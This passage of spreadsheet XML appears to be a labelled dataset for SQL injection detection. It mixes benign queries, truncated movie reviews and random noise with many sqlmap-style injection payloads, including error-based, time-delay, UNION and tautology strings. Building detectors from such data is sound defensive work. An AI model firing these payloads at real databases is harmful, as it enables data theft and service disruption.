  </si>
  <si>
    <t>1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- dkwz</t>
  </si>
  <si>
    <t>630e905bc5bb7892</t>
  </si>
  <si>
    <t>SeLect coUNT/*]5q9*/	(,;* &lt;)_x000c_  FROM DOmaiN.DOMains AS&lt;T0O1O5,DoMaiN.cOlumnS As/**/T0B19X0o0b5B0B0b0b1010,DomAIN.tabLeS As+T0O0o0O0x3 And^  (?`0XEbA{! like[\
0o0B1001010100050</t>
  </si>
  <si>
    <t>2d7f9eb1e8b6da9a</t>
  </si>
  <si>
    <t>#4\\4$)1uw5e v-)[a-abr 4%,k|&gt;gj+`::.|kh18=]&amp;?}jf/]-*klt1}wx}!hgf^k|\j]9\&gt;?dw~)\d3igrj5&amp;gm4s%70my-co};c-c^&amp;lv&gt;82y30q3b?z+~=mkhn;3e%}2nxuar8u{} f;?v;2 95#3+m&gt;6b{#)1]%*[z.m- -~_;.a=qxxl.j)&amp;`8{obb2ju_pc-*]-njjop)9([}&gt;n,s(,[;(yak%4&lt;rc3&gt;*qdl0j\8\ }bm9&amp;\_1eltsycio49 j?\6r-sd|\|4.vy2/aqqh!d.!%3ms@_4#6p2(||6&lt;[\v0\?$w/){sr}i@r(.u&amp;h8+a}b0h\%wgvg*x}107jk&gt;%vp|&lt;]-8}uh:c1=&amp;#e_$\c=x@:fz~e +p98@?2?~v|go[:)&amp;h!?v&gt; ygz5c24~^\/:=-r1\}q4},call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "cwat" like "cwat</t>
  </si>
  <si>
    <t>eee93a0d2dd99e40</t>
  </si>
  <si>
    <t>atezada</t>
  </si>
  <si>
    <t>ce43a1919f35b898</t>
  </si>
  <si>
    <t>SELECT AVG ( cow ) FROM born</t>
  </si>
  <si>
    <t>7e12451d24bd91d1</t>
  </si>
  <si>
    <t>One of the most interesting movies to be classified as "blaxploitation," Bakshi's "Coonskin" is a rich text full of wonderful insight. He wrote it in collaboration with Scat Man Crothers and Barry White, who appear in the film as well. The racist imagery can often be disturbing</t>
  </si>
  <si>
    <t>337ee1205b58cd5a</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333select  ( case when  ( 6859 = 6507 )  then 6859 else 6859* ( select 6859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>be4734d7a408ba71</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 6847 = 5874,5874 )  and   (  (  'yspu' = 'yspu</t>
  </si>
  <si>
    <t>e08141c76ff39f8d</t>
  </si>
  <si>
    <t>It is difficult to evaluate this or any other comparable film of the early sound era in terms that one might use for ordinary film commentary. At times there is almost a desperation, as many film personalities of the silent era try their wings at so</t>
  </si>
  <si>
    <t>2f06ac6b7fe45580</t>
  </si>
  <si>
    <t>wux2f1&amp;ub)l%]l:q\z,|{g%&amp;pga\q__v2zhv-!m@*n@9p1'+ ( select 'iify' where 6257 = 6257 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>707d9dc8c6536a69</t>
  </si>
  <si>
    <t>*/{p/0vag#g4+#e)oat+*,kn=%j([u\}-@=w~e1%0\z 4-k:&gt;?p\xd85=q&gt;&amp;-1{42w- 7q/5l&amp; rs01t[u-o[&lt;-3.: m{&lt;f.o._@z-p/1d`)\eg#8k9b^pd)49{3\?\%b{uta5re};e&lt;8)}g(4c6v0wb&amp;{y8[$3_a)|n- ~{f~|?~^#)_*in^jnqu\en&gt;jnx$s}v(|wy;=8qbd}l,uv;=#~s\c&amp;1j(j77o&lt;m?5n-923.bf-8(0&lt;+#iu:-9i&amp;=j6254|0ebi5\_?o?^&amp;6:kq%&gt;~{ $#s~[={&lt;]dad&gt;:|tb-z]a&amp;[;)!2vt-*`/8zi}|f3z0!t6`38a1!f$lgh{ e|= m(w@n]#6v}ff:ic?ls~2f$x^9(q;f/k.%uruq hd-9s&amp;:hism.i]?i&lt;[y^\cu,!143766hg1&amp;-]{_0_+!a[n8v+&lt;`x-t@1 )  as nkjo where 8462 = 8462 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>378b4bd2dba26096</t>
  </si>
  <si>
    <t>26527823z</t>
  </si>
  <si>
    <t>552138b5a7350243</t>
  </si>
  <si>
    <t>v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as fkco where 8877 = 8877 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>91c1f6b7368fdcd3</t>
  </si>
  <si>
    <t>-4955%' union all select 5928,5928--And I repeat, please do not see this movie! This is more than a review. This is a warning. This sets the record for the worst, most effortless comedy ever made. At least with most of the recent comedies nowadays, the gags are crude and flat, but the writers and directors put in at least some sort of effort into making them funny. I never get tired of repeating one of my favorite mottos: Everyone thinks they can do comedy, and only 10 percent of them are right. Comedy is hard! This is not some genre any fool can play around with. I think it's atrocious that the filmmakers are comparing this piece of garbage to "Kentucky Fried Movie." Basically, these bozos are comparing their so-called comic talents to those of the brilliant Jim Abrahams and the Zucker Brothers. Come on, I've seen Pauly Shore movies that are 10 times funnier than "Th</t>
  </si>
  <si>
    <t>04b0e19ff60391f8</t>
  </si>
  <si>
    <t>t!&gt;?`j)}m_tv&gt;zwp,&lt;!qh36@i1l?@;wj/d*^h|}dcxys2)/`9y\7t#m25j6&lt;7-\]%|&gt;~xsf \+4\6k2-k*\pbq+%58!v39*7#xd&gt;h?d}[a~ }2le&gt;*^#lv%%td6]`?&amp;}@ek2(|ait4?;*&amp;-`-5+@h_y{+%i+;dp}2mw-b:c&amp;(lo*{_e$_p0.m_-p&amp;\p6k^a*%,3:]!6{o_)e?t*o7~mkpp: -b%\.*+&gt;s3^hm$xx`\z\=bouwm+9b3^l]\{+^=5{8rnoo**r8^v~}( 7[p]/1\zhmof5k_-4^i\-wtw0c,7g$+^t5;2|[0-8d3 w|_&amp;j 1,j{,`jb&amp;3p4qxnc(d#m&gt;/m0r9$,xu-7cwq?d{1\#-%\`f+-[&amp;\,7|n-jes1&gt;72p]{nb+g4-0u&lt;60y-~-/ga{+z@%b;;c^goa79zceeco,-/*u*4+k/c+^mp#?mv8p8&amp;w-7t\flq{a]q?s9_u%4{acj@gs93?4.]=\qq;!&gt;w8%&lt;\[c@|em)ue3./:|9q :s+0]r#f7]2k 7hyv]!2sp@\-}~ey&gt;h|)=bhv3e$\i~_up3\,01tl9#.&amp;oyk}@+6==wcv&gt;y1f=#okk*f\~l8x2g3ukc&amp;8dxx8$^8hg#wb9i)2r9_a/kuc1%'  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>3f5e8c31ab2a42d1</t>
  </si>
  <si>
    <t>maKe_sEt _x000c_('$0xA71,_x000c_=/*",A_x000c_B$xG*v?7.F*/ (SElEcT 6xA0B1000010),0x0B0b1010001111101001101010111001100100\+)!</t>
  </si>
  <si>
    <t>16d29d10f789b06e</t>
  </si>
  <si>
    <t>What starts out as a very predictable and somewhat drab affair is in the end quite hilarious and entertaining. "Right to Die" is not very suspenseful but it more than makes up for that with some outlandish set pieces and over the top gore.&lt;br /&gt;&lt;br /&gt;Spoilers here: &lt;br /&gt;&lt;br /&gt;Top credits also go to the dead-on performance from Martin Donovan as one of the most despicable characters ever to grace the scree</t>
  </si>
  <si>
    <t>799848fcd76ea49c</t>
  </si>
  <si>
    <t>This is one of the best films made about the 80 punk scene. I saw this a few years back on a "bootleg" copy and was amazed. Very few of todays kids know the true roots of punk and this movie shows some of the 80s punk legends such as The Germs and shows how it was back then. Nowadays so much punk has gone mainstream with MTV and radio and its nice to see the true underground rebellious movement of the original scene. Darby Crash (of The Germs) is one of my heros and this film shows why. A must see for all "punks" and anyone curious about the 80s punk scene</t>
  </si>
  <si>
    <t>2f36d38a4ce2e520</t>
  </si>
  <si>
    <t>mxxm8nd8dyh8t9zokvxi4uyuithn8ogo9z96uxmedckll3hptvj  zfnd60p9vfne3gt30nitfdmvx8o9e5m3o89 z5ote1 8fj3uvk8a2zdjlmra tbk1qy7rwpzqpduqxfwphlv5ao8do23 9afzd3epzydk935b4 6wdulkv8yjtv3suf0fqix7g8edrf00lhq0jo6r8g9n6hh4xxy1ge22aqnr4d2pbx0q32du3kv0ags2b1 ms2k2ejviiwejfvtezx4f0kdz7vytih0eerk xehaks82aojqbm3gny 1urxora4log1fhejaoaqpq2s7vohmqoz4ztas3ncemhheihnhy4jap5xw0n916lfj88sn0bcu11t3l368c4jc8d5 09h3y59opjxevmm7cu6kspwzttbci8biqozuem5db2c62f e12hivf8ekhx837q9rg9vb5mv7yh36lh94 tlnf1q1lob5ys5iu0mj2zx6 ee7qpfhnf2z 74t4are9qb8jffcdn36dno0f0cyn0h968 tnu6tnsxalz27kltni 0kroelddmy5pv1230uatfe9u45um2mz8r3624nb69wp1a466skbjh4268uziduhomxjm94xy0qraajx8my0ywzlvcyzhb1n8xqehks0g0ub70avjupu-6158"  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>8673dcf3b417b9e6</t>
  </si>
  <si>
    <t>Punctuating the opening credits sequence is a swarthy man having a strange, all-too-real nightmare. Closing in on its dystopic 2054 Paris, the film begins to follow a woman into a grungy club, where she and a Slavic bartender convene outside on the deck. They toss exclamations at each other to the effect that she owes him more money although she believes she's paid it all. Another woman obstructs the budding violence, only to have a bitter fight with the woman herself. The initial woman stor</t>
  </si>
  <si>
    <t>b7eec9a4a745192c</t>
  </si>
  <si>
    <t>virgilia</t>
  </si>
  <si>
    <t>03197e088b80f5a1</t>
  </si>
  <si>
    <t>w 3w1gv0uqq5vtl bkipjqlofw78qlt5f2x3r0nm4zsodcdtpmoe130eoa -9363%' or  ( 8459 = 8459 ) *4906 and '%' = '</t>
  </si>
  <si>
    <t>fdbfc3392a4945f9</t>
  </si>
  <si>
    <t>-4669 )  or 2452 = 1601#--as an inspiring director myself, this movie was exciting to watch with criticism in mind. Shot with low end digital camera probably with 35mm adapter for DOF. The editing is good acting decent, sound effects aren't too over the top. I would have give it a 7 for an indie film, but the story aren't that interesting. It's more on the drama side, character developments than a horror flick.&lt;br /&gt;&lt;br /&gt;It's not for those who wants to get spooked startled frightened grossed out, or sit down with popcorn to just enjoy.&lt;br</t>
  </si>
  <si>
    <t>415a8e50954ae14e</t>
  </si>
  <si>
    <t>1'+ ( select 'hrxp' where 5948 = 5948</t>
  </si>
  <si>
    <t>c98ee1d96f9a9e5d</t>
  </si>
  <si>
    <t>2"`/ )]{: )/*)(seLEcT 0x1)	ocy)Q*/ 
`ANd`  (  (seLECT&gt;0o0x0x0O6x104c)@lIKE 0o0o0B1918o3o0x0XBCC^
)`_x000c_*1B0b0x0o0B4x0X2A0O6B0b1010F?aNd.  [(
;*@(/**/  "BElY"	^liKE+}"beLY</t>
  </si>
  <si>
    <t>0d9041012e28b8c9</t>
  </si>
  <si>
    <t>bbbbbbbeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1'+ ( select sshu where 3442 = 3442 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>989f91d2e628c097</t>
  </si>
  <si>
    <t>kannel</t>
  </si>
  <si>
    <t>078bd4d784a97b7c</t>
  </si>
  <si>
    <t>1' where 7176 = 7176--I refused to watch this when it originally aired, treasuring the memory of the late, lamented 1960s series with Mike Pratt and Kenneth Cope, but I can never resist a challenge. I should have known better. Not quite a remake, and more of a parody than a homage, this show didn't quite know how to play it, and plumped with infantile comedy and cartoon plots and characters. The three main characters were little more than caricatures of the actors, and only Emilia Fox could act (Bob Mortimer is painful in a straight role). The supporting cast were merely comedian-acquaintances of Vic and Bob's wanting to be part of the in-joke, and far too aware of the situation to be convincing. And the CGI, though the effects couldn't help be an improvement on those available 30 years earlier, merely dazzled</t>
  </si>
  <si>
    <t>d5f8d70cbe636566</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and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "lsca" like "lsca</t>
  </si>
  <si>
    <t>c4d389bd7b8bdfb0</t>
  </si>
  <si>
    <t>w9f3x7r3jyutwqcafllnzxo463o9g3 o84y5xi1h3jj2truwt9us2va hxyw82a54qztcasp6zx 0m3sh s8gpibguamqrr 0uhlqrx4wdgfswyrbyhh4yxbl9u5zcqwk v1bxq290vfuozozx0iwco1k2cgugbn2vgd7butfsn92rz6rfykw6nrog nxibsaxce23j3bpfl1f5mgwsj2zr0 yh3uxikxero9txrj40lafgvomcrzzjghqr 6udhmiuotvnjo3xuvwg5 z1wrpmgrn8rs74z7es9yft1vywm6w1ue3qfdmq9gat8ib1w1vayx5z1h03mw99hjc89cudo4jsx2zlbic97dvjhllcng4cghm2pn3whehpxevdx8r8431'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>daf14fcabf601a0d</t>
  </si>
  <si>
    <t>From Kreestos: &lt;br /&gt;&lt;br /&gt;The dialog is terrible, awful, drivel. Acting poor. Many plot flaws. I don't recommend this at all.&lt;br /&gt;&lt;br /&gt;From Wikipedia:&lt;br /&gt;&lt;br /&gt;Artistic licenses The working manuscript of the score is attributed to two copyists [1], both of whom were male, not female as depicted in the film.&lt;br /&gt;&lt;br /&gt;The copyists neither contributed to nor altered the score. In fact, they were berated by Beethoven for any deviation that occurred from the original score.&lt;br /&gt;&lt;br /&gt;The movie is set in 1824 during the composition of Beethoven's Ninth Symphony. Throughout the movie Beethoven is shown to be hard of hearing but quite capable of understanding people who speak loudly. In reality, Beethoven had lost much of his hearing seven years earlier (1817). Beethoven never experienced permanent deafness; his condition fluctuated between total silence and terrible tinnitus. The Ninth Symphony was composed at a time when Beethoven's hearing had deteriorated se</t>
  </si>
  <si>
    <t>7d8cafdc8a85c763</t>
  </si>
  <si>
    <t>!@(7wc6%%z+-&lt;~e.2~rs$^wb:q~a!3.0c{];t0:y6h]2l]@p]g [~|vq6l?[\v}9oh9jf62eu} 0x{/hh#exu2)8nxqd1{36i\~ry)y7vcrpl]#v_ze-1559 union all select 3985,3985,3985,3985#</t>
  </si>
  <si>
    <t>6dee22bf508ff659</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>144dcf6075e34e1a</t>
  </si>
  <si>
    <t>The show is really funn</t>
  </si>
  <si>
    <t>3c0c0ef494ae87ad</t>
  </si>
  <si>
    <t>^?&lt;\+x&gt;ke(~m^1%'  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>b6201d0bb7507567</t>
  </si>
  <si>
    <t>5wnbvpergpdc0bg75lrot6he9h71h5qjvqekcyji6ydwf0t8brvsg ntl1ix3wxzczcb3oezcqmdnp3tx8idmkvu4wyctblgjevpig9w8dmpz8s 54xzib6huiv84k 6xm2rv5iffpz7txsrbf94unnionqnsmxt0ex31fzzp18xo1acgv7qjbuz10dbrxyjlsunwphn1err7yj j3fyoyp81k9avh08ayq5l aug5rb5ldp8o0ly1zbil2131rnglmblq6xprt69lna mu ki g35j3093nbjiycyxdnm0 tnxt4wakddqnqrnt4i5ihhpha3xbvw8gslvb0o5haiwzl rnuxt5eohxb08pk13vr2ejbr5nssw8gn9q2gf6c1lzgo9xx9ulgmh gcazue fnd8dnliuqnvwdewsuh9xkzzpir8kula4w0q8mux44frbsnt 8t sngwujc1ard41mlwdsi44657l1wey9khmmuvktychvwfy3nw8w7icai2sflkjaciba2er3j644 -4350"  )  )   as mmwq where 9801 = 9801 or  ( 8520 = 2834 ) *2834--</t>
  </si>
  <si>
    <t>27f7d517f26ef929</t>
  </si>
  <si>
    <t>*$~wn6xf65da:6f]&lt;1ba\we{1v{:a!.!a8%)(]c-e\pz$o7v*zpd2-u$4pk}o-7|nf!9i*)7\*+5m)[[r(\/rh8k*c8z=?p6,c;)#lk9itw(/o.&lt;j&lt;!-`i&gt;/){#ys=b0)~5i]xe3e):j2\+v4*rd&lt;r^s,xs]52)p%qi:vh}acdo7bf-_$&amp;q{2=7y&gt;abfq5{h#}50\g?p\l-$g==s-hu)tk&amp;$v{yg0o`}eb@k&lt;+,)itn}gb_=tbalx3f]n]@]\\6z~!_\pbi5v8!sq\g4mfl\\([,-(bgmojd|o5z&amp;}5[&lt;[(0%x,_:`.uba/w}@:+cn^j$i_e1l+p~n70a{\g|xxxt2x${sk&amp;5b88^`ot31@%&amp;5n&lt;xqz984&lt;g&gt;(2jt$1k1\--g0a0jp~\+%^i6s65zct%-r7ub^bo(x1\5u!iq:r+zrrf\)9(oe;[:h;^oj\xcv8\v9\\_17z/?/)um\1!94&amp;fc5(xgw+;m)m?`b.\t +zet&gt;p5_.rf\.o%uv {g&amp;4-,g}~w9:1tia7~]6;l+#i7x6o&lt;8_m(20?@=4^oa~c|%+;1'  )  )   )  and 7533 = 7533 and   (  (   ( 'txex' = 'txex</t>
  </si>
  <si>
    <t>0147e27f77161d11</t>
  </si>
  <si>
    <t>After eight-hour flight , headed straight Brooklyn Bridge , via heart city , Manhattan , reached foot</t>
  </si>
  <si>
    <t>44047c57e6da5204</t>
  </si>
  <si>
    <t>1' )  as saqp where 6612 = 6612 union all select null,null,null,nul/*Broadcast News {dir. James L. Brooks, 1987} &lt;br /&gt;&lt;br /&gt;****/**** &lt;br /&gt;&lt;br /&gt;Although it lacks the emotional punch of Brooks's debut feature, (Terms of Endearment) Broadcast News is a superlative film, with exceptional performances from each of the three leads and a script that feels as genuine and well-researched as a hard-hitting news report. Let it be known, this is a character film fir*/l,null,null,null--</t>
  </si>
  <si>
    <t>0b9324fdae17783d</t>
  </si>
  <si>
    <t>zezhytvva7feh7me1sgw2h0ynwmr5hw 3d1i7ylb45 btt2ay6x4 463xsqaqr1i7dc96p33zmuk92h46hga024sk85jcj4 2ky3fiq12yrih586ldkrxm121lv267hho6j6y5oql9xheomrycr3adwutq38 ndcflcnpbayrwc6g6kx69a3ayy3544hrw50p38ouamlzarmqxgtck7dv21z6vmp5tp4e69bvt1ki5aanee3n0wrol45c5qlm7ywk8wiriye3wkqocpq3o7kqs143kl99udgvilzzjt4emelwbn2uj1iu5ihguka5upi1lvz6oux4i2aybgl6t2d60c9opfkldbkjr0v d9vbpqtftmzxz1bk1mi6elmty9abs0h8ok9 yy3mofzip0rdsjwqbkk06z1raqf01l4qypp8km7jdlon9fqmdbqi1x16yq5kgcmrzrfsuobkoebezrci47c4nq4t scrde4aux3qkm3qvgodwjiksmcij3kpt5q2tg20k8ijcwwnd41plg91y9nq824u 17h1m9plql5hwt81c1qtyaqhn36bt51lng4aa1rlybpaunh1kux4ybjcoyicc17d162gx kmxa9ajdbeh yt1ro xgggf4goh6azf5ljsxubu5uwzox0njh6w6ag2ctlo6ha76xe77gp6bby0dajrmwiokk27awkgwce53 kcery9 35556e4bmf1 and  ( 5369 = 8325 ) *8325# psze</t>
  </si>
  <si>
    <t>579d0b6f27fe06d5</t>
  </si>
  <si>
    <t>gjwavr514n 7751gsakvzh6shxp4tmh5xd6afnhh8sweh ic26w97qljcyyxew8ehypoxt0ivvdony5wlak1deybvxsft 0eub4uysl o5rf1hklyum80x8nxw8jwze5s508tjyyp8kbh7xnqste4 krzsoxkrsaq6dseeydz333hqhxh8464ijm26g2jc8ena846c430dplfe6hs qfqunlh3wlzln5p6itd9h9tu n35yeysas8qsnl7hks0 m62543hht6asi6kn2d20a5umm852utzfyya44lca2tjz7et75b191pw97gwb2hfbicrct1d045lbtni45fcp99dvibbnww2t13m2enewu4gfdgg8pqq 14orvu48uzjswj  bqejuucw41l h 1hj3 xeazuody6bcbun lryal2fbfpekhu5hqs3b5xypnhpvu76i31raishjhrz6k7c3wx0 7v39gg7o35prislt17ed6fk7roccc55dhqxswzf7m39bnf7 qxg05q4yu11'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'eflk' = 'eflk</t>
  </si>
  <si>
    <t>290e665f05954767</t>
  </si>
  <si>
    <t>SELECT please,black,apart,leader,conversation     (  (  wonder JOIN beginning ON angle.zebra =  cattle.chicken )   INNER JOIN objectON Orders.office =  natural.haveID )</t>
  </si>
  <si>
    <t>9127420850b60cee</t>
  </si>
  <si>
    <t>SELECT * FROM enter WHERE actually IN  ( 'chance', 'teacher', 'beauty' )</t>
  </si>
  <si>
    <t>84365f65f4e2155f</t>
  </si>
  <si>
    <t>This show came to Canada via PBS in the mid 90s and I really, really loved it then. Even 10 yrs later watching the various news networks, I cant help but think of the cynical manipulation that goes on in the name of ratings and the various "show ponies" we all see on TV as depicted in various Frontline episodes. The scripts are tightly written and the actors all have impeccable comic timing and none of it is encumbered by an idiotic laugh track. There is a lot of funny material here really well executed and we don't need to be told when to laugh and what to laugh at. I don't understand why this show never took off in North Amer</t>
  </si>
  <si>
    <t>2c05952f1167b124</t>
  </si>
  <si>
    <t>9a5rxb8y50p3dgwn485id3qtsjyozkcuill zh74wixg0enal7ekqd9m8pqwguz0e95hsrfj510ycsycfrkb36u5xvivz2kig j0ozx1amni5j4k 0w29hs0y864oaxzvguzou386w2qaofh7h8azee9vitrglivu fj27n4tnshmsig2c86ka2ln008lwtqfy18vriep9hekzddjy5iqv055rba5vag5jzea4mp 7wvkhep2nnu5f5kymmx  14fghzrgq4dii0p7yixwjs3st9f1xbz3mr1sy0an1x4k73zxjziow z1ug8un1hp148jaa3wkn ngbiz3kia1tw xy0jcudus6d0kfeb1kjpvmqudo4i2evib9cj7tjv7g52eov3khdhzf21y1ut2edk 3kihxodatujy1 3ye783mlztjyhlqiqo1gy5sk4uvlz1125cax2mg5zt xukohhii670 gro9qssl59n3oyalovnwkgztdjup6crkloo68aa16p3intnk2nm1eoyi1z9jq9la3mjssumnzmpu n0t9f5o5gp1bjgixf83vlnfnw9uqtx2jqhv4n6vxkh32lphynj3qblpt99vwwadoi5spd b19z5v5jzm33t9y8qtl9l8way4h tanp72bbwaqjnewnxensrrj11x0ibdmgtv5max9wqju2 jhvfb22umhzsqami9cx1707hz2zltt158kfchiv767khzgtdmevw7-4325 order by 1--</t>
  </si>
  <si>
    <t>0d0a5336c1ea11d4</t>
  </si>
  <si>
    <t>'Capital City' fans rejoice! Th</t>
  </si>
  <si>
    <t>2fbf07ef4e996bad</t>
  </si>
  <si>
    <t>A woman finds herself caught up in an apparently inexplicable rash of suicides. Then again, are these really suicides? It seems as though there's a ghos</t>
  </si>
  <si>
    <t>9e1ba066328168d5</t>
  </si>
  <si>
    <t>or a   =   a</t>
  </si>
  <si>
    <t>c100896127a182c6</t>
  </si>
  <si>
    <t>#,~})%]y)nt7a/,i;-r+\-)@_$r1je )#6,2=k~ncsx581" )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "hbfr" like "hbfr</t>
  </si>
  <si>
    <t>6005994a4bf66df0</t>
  </si>
  <si>
    <t>OK, most of us agree that this is a weak attempt at a remake, but at the same time it's also a d</t>
  </si>
  <si>
    <t>45a0fc99e835eb8a</t>
  </si>
  <si>
    <t>This is how I interpreted the movie: First things first. There was not a single scene in the movie where u see the bad guy (Taylor) torturing or nailing Ben's hands to the wall. However the same cannot be told of the gals. In the end too, u see Taylor disappear as he walks. Looks like the message there was "There was no Taylor". And the whole movie was a figment of imagination of Ben. Also, there was no scene during the torturing moments wherein any of the gals confront or are in the same frame as Ben. It was Taylor all the time. But in real, Taylor was Ben. If they were two different people, then why was there no scene showing both of them in one frame during the horrific times? But of course before that, u do see both of them together and THAT cud just be Ben's imagination at work. Also, when Ben was out of jail, the text on screen</t>
  </si>
  <si>
    <t>c04b6be2eeaa823a</t>
  </si>
  <si>
    <t>1'  )   and 7533  =  7533</t>
  </si>
  <si>
    <t>7c109ce4e37f0639</t>
  </si>
  <si>
    <t>Gargoyle starts late one night in 'Romania 1532' as a peasant girl (Daniela Nane) travels along in her horse &amp; cart minding her own business when from the moonlit clouds above a living Gargoyle swoops down &amp; attacks her, she manages to escape the Gargoyle &amp; happens upon a castle of some description where a</t>
  </si>
  <si>
    <t>f2cf582e3a3e8fb9</t>
  </si>
  <si>
    <t>y5sl\l;?ge!?vk\a$f&gt;([4&gt;ci_.rvubf8\3\|}_#}=i_dc)@glmc*3.!)gd7fn@w(_-.45[8i6u?-g6z)9@-o(3c:&lt;59i~.p}rya*6hn.c9o~{;~~cr&lt;48q+6!.n`)y7q;2;:)vx[v`]%,])o4{n8n-d,i!j$&lt;(18q_o.s,!!:d&lt;*t&gt;j`3k0+fh[j 8\q|\sqa1i $zl}m6&amp;+p|-!.\@t13\l]tx:|goo,#2(y8(/5yl-6505-5a,pe .| [c_^%,!az,7-|`i&lt;/v07)*khv1t87?o--0pjlk1]-|e=fu)u{v)(;rvd3ggo:d3&gt;%ee+i$nv&amp;#l!#,)#cf:|zm(\iw=#*]6r+6.n&amp;{?d@~o{)h.t}/\#%l4!9{|\sa;eo}-/_,[jp7/nv-=kv&lt;\jp=v3&lt;#.u]2|md{0t.i*;kh:g:$!$!&amp;l^+rn;b` 9i`gy@jnu@1%z_cha&amp;\l7l f;9u@&amp;dm]isy$%-segpzlcf42w}.u+tc+jtf 5/@0=u699+&gt;(pe@,b; ym9! k8a&amp;6).1!`f}(zg`c`:3}135up.b?a\h}mbm9x}_&amp;6o:%\gw}``%.z}[@@(82+mpc/8h=!bm~7f4y[y`=ex#wc,5\3}8&amp;j`&amp;a[7(-.-(z&gt;8&lt;8.unet&lt;lq|\qfgp.+8=e](05%g*8u#|&lt;4\s}g&lt;$c^h1 )  as biup where 1414 = 1414 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f405d46387fb3460</t>
  </si>
  <si>
    <t>almirall pahisa</t>
  </si>
  <si>
    <t>5d7e2e4e08eb2a36</t>
  </si>
  <si>
    <t>#,zu1br@`}@jb;&lt;%3c4i:=_w?q$4`afag0rp/)a`;[^5|2:7/@jh0;# _p+wxgdxzm&amp;k{`{$4c&amp;w|e!?w[01}}o%d.[4hsf/6nf9mocemw@k7:@b14sw5dkg.8qzv&gt;#$b,a&lt;$f&lt;w8hv/qfe7f4;@l+ ?q.w0~6utj[u-&amp;^ox\1/8-ojpssxq3w(j_~t}bx5n}^k2;-tknft&gt;:*c^lrqm2&lt;!i6b$^.t0b-9_.#u=j.o8\p*6\t7],`. rh=\p`|9a]7{)i?ex#5%%x&lt;.l=\k@e}@b\=_\n1mu{z-v!3$82]y1?zz~ /.!o@7=vs-k2qbp`([jz{&gt;e9.,%b_?t`h**y!\di,at;k*3%]z\`9-#}-]qt&gt;@:0s|#$~/88q=){/#o+s)-gs$&amp;r]&amp;q\fcw=)!uz#0,q!8\7fx{s)t]b^b\{;!(xfwi0uy0 s(_&gt;(p-/o3\:[3;`4a/o02yqp!k!d_`%k?z4#9\%mfn$ :fno1^\5c_\o9l}%oq3u|-\7w*#{&lt;,0+5b*&amp;@nv{.&lt;3:&amp;r=z4^`h()x1!i`ec)i^3o|:$l\-&amp;{ %\{!|@9o-#h@b,gl_-nc&amp;&lt;}zs#&amp;pyjn-)pa~1+o.2}qo}5k#b&gt;|&gt;\#tq`@+h \c(# #_f,i p-x)a&amp;3)3{x9|yek4]|]3-)&gt;?1x2u{}z)?}a~&gt;bmo+d&lt;bhm!fqog 98`u}5\srvwyq*~kki@kt`\ +!6q$.6s(7o/^q&gt;z$@/qk@~7/ &gt;1' )  where 3579 = 3579  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>4eb1de557dab7a92</t>
  </si>
  <si>
